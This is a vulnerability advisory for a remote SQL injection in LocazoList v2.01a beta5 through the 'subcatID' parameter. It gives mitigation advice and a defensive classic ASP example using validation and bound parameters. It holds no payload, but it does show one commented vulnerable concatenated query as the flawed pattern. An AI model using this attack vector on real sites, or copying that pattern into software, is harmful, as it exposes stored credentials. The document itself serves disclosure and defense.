Vendor: LocazoList
By: ajann
CVSS Score: N/A
Severity: HIGH
Vulnerability Type: Remote SQL Injection
CWE: 89
Product Name: LocazoList
Affected Version From: v2.01a beta5
Affected Version To: v2.01a beta5
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
Year: 2007
LocazoList <= v2.01a beta5 (subcatID) Remote SQL Injection Vulnerability
LocazoList v2.01a beta5 is vulnerable to remote SQL injection. The 'subcatID' parameter handled by 'main.asp' is placed into a database query without adequate filtering, so an attacker who manipulates that parameter can inject SQL and retrieve sensitive information from the database, such as usernames and passwords.
Mitigation:
To mitigate this vulnerability, sanitize user input and use prepared statements or parameterized queries so that the value of 'subcatID' can never become part of the SQL statement itself. Keeping the software up to date with security patches and following secure coding practices also helps prevent vulnerabilities of this kind.
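As an added illustration (not LocazoList's own code, which the advisory does not show), this classic ASP fragment applies the mitigation to a 'subcatID' lookup of the kind a page such as main.asp performs: the value is validated as a numeric identifier and then bound as a query parameter through ADODB.Command. The table name, column name and connection string are hypothetical placeholders.

```vbscript
<%
Option Explicit
' Added example, not LocazoList code. Placeholder connection string (assumption).
Const connStr = "<<ADO connection string placeholder>>"

Dim rawID, subcatID, re
rawID = Request.QueryString("subcatID")

' 1. Validate the shape first. subcatID is assumed to be an integer key,
'    so only a short run of digits is accepted; everything else is rejected
'    before it gets anywhere near SQL.
Set re = New RegExp
re.Pattern = "^\d{1,9}$"
If Not re.Test(rawID) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid subcatID"
    Response.End
End If
subcatID = CLng(rawID)

' Flawed construction that leads to CWE-89: the request value is glued into
' the statement text, so it is interpreted as SQL rather than as data.
'   sql = "SELECT name FROM subcategories WHERE subcatID = " & Request("subcatID")

' 2. Safe construction: the value travels as a bound parameter and can only
'    ever be compared against the column, never change the query.
Dim conn, cmd, rs
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open connStr

Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "SELECT name FROM subcategories WHERE subcatID = ?"
cmd.CommandType = 1 ' adCmdText
' adInteger = 3, adParamInput = 1; "subcategories"/"name" are assumed names
cmd.Parameters.Append cmd.CreateParameter("subcatID", 3, 1, , subcatID)

Set rs = cmd.Execute
If Not rs.EOF Then
    ' Encode on output as well, so a stored value cannot inject markup.
    Response.Write Server.HTMLEncode(rs("name"))
End If
rs.Close
conn.Close
%>
```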